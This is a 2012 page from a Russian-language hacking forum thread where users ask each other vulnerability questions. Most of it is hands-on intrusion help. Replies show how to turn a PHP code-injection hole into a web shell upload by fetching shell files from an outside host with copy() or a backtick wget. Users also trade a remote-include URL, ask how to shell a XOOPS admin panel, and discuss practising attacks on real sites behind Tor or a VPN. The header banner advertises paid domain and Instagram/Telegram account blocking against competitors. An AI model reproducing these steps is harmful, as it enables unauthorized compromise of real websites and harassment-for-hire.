УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1918 из 2438

1918

Опции темы

Поиск в этой теме

Опции просмотра

#19171

09.01.2012, 00:13

shadowrun

Guest

Сообщений: n/a

Провел на форуме:
183267

Репутация: 84

/ 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php

не?

#19172

09.01.2012, 00:18

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от Skipp

Skipp said:
Спасибо, понятно, но в моём примере стоит 5 пар (../../../../../), или я что-то не допонял.

4, можно ставить больше, сколько угодно (в пределах макс длины урл), ибо дальше корня не пойти

Цитата:

Сообщение от shadowrun

shadowrun said:
/ 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php
не?

это когда pg.php стал папкой?

#19173

09.01.2012, 00:18

Skipp

Новичок

Регистрация: 12.05.2010

Сообщений: 2

Провел на форуме:
33215

Репутация: 0

Да, понятно.

#19174

09.01.2012, 00:45

ocheretko

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
29

Репутация: 0

Нашел уязвимость, отсылаю пост запрос с содержимым:

$modi=

все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h

Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:

file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';

только как избавится от кавычек?

#19175

09.01.2012, 00:47

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от ocheretko

ocheretko said:
Нашел уязвимость, отсылаю пост запрос с содержимым:
$modi=
все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h
Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:
file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';
только как избавится от кавычек?

copy($_GET[a],$_GET);

через гет отправь

a=http://site.ru/shell.txt&b=/var/www/html/shell.php

если shell_exec не отключено, то можно и print(`wget http://site.ru/shell.php`); или curl

#19176

09.01.2012, 00:48

stepashka_

Познавший АНТИЧАТ

Регистрация: 09.11.2009

Сообщений: 1,077

Провел на форуме:
7879791

Репутация: 265

Отправить сообщение для stepashka_ с помощью ICQ

Цитата:

Сообщение от NZT

NZT said:
stepashka_
, скажу чесно дело в том что я боюсь на популярных сайтах тренироваться чтобы потом проблем небыло , или
Tor достаточно для этих сайтов?

Поставь себе на комп бажную цмс и тренируйся

Или купи vpn.

#19177

09.01.2012, 01:19

ocheretko

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
29

Репутация: 0

Благодарю, все получилось, +1 прием в голову

PHP код:


		
			
PHP:
[COLOR="#000000"]Dim url as String = "example.com"

Dim postdata As String = "modi=[COLOR="#0000BB"][/COLOR]"

openurl = "http://" & url & "/scriptname.php?scdir=/var/chroot/site/readme.php&ldir=http://yousite.ru/1.txt"[/COLOR]

#19178

09.01.2012, 09:53

NZT

Guest

Сообщений: n/a

Провел на форуме:
6075

Репутация: 0

Цитата:

Сообщение от stepashka_

stepashka_ said:
Поставь себе на комп бажную цмс и тренируйся
Или купи vpn.

Насчет быжных сайтов на компе так я хотел бы тренироваться в интернете , так забавней )

А насчет впн , так я хотел бы пока обойтись простыми и не популярными сайтами для тренировки чтобы не нужно было сильно прятаться и заодно бесплатно , или для хорошего опыта желательно поставить впн и потренироваться имено на серьёзных сайтах. Что посоветуешь? Я новичок и хочу научиться , поэтому я обращяюсь за советом поскольку ничего не знаю )

Спасибо.

И как найти простые сайты с xss ? Просто лазить по разным сайтам и искать или можно как то через гугл найти кучу простых сайтов а потом в них уже искать уязвимость?

#19179

09.01.2012, 13:05

DyukiN

Guest

Сообщений: n/a

Провел на форуме:
74477

Репутация: 21

как залить шелл в xoops через админку?

#19180

09.01.2012, 14:33

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от DyukiN

DyukiN said:
как залить шелл в xoops через админку?

/showpost.php?p=2962252&postcount=4

Страница 1918 из 2438

1918

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход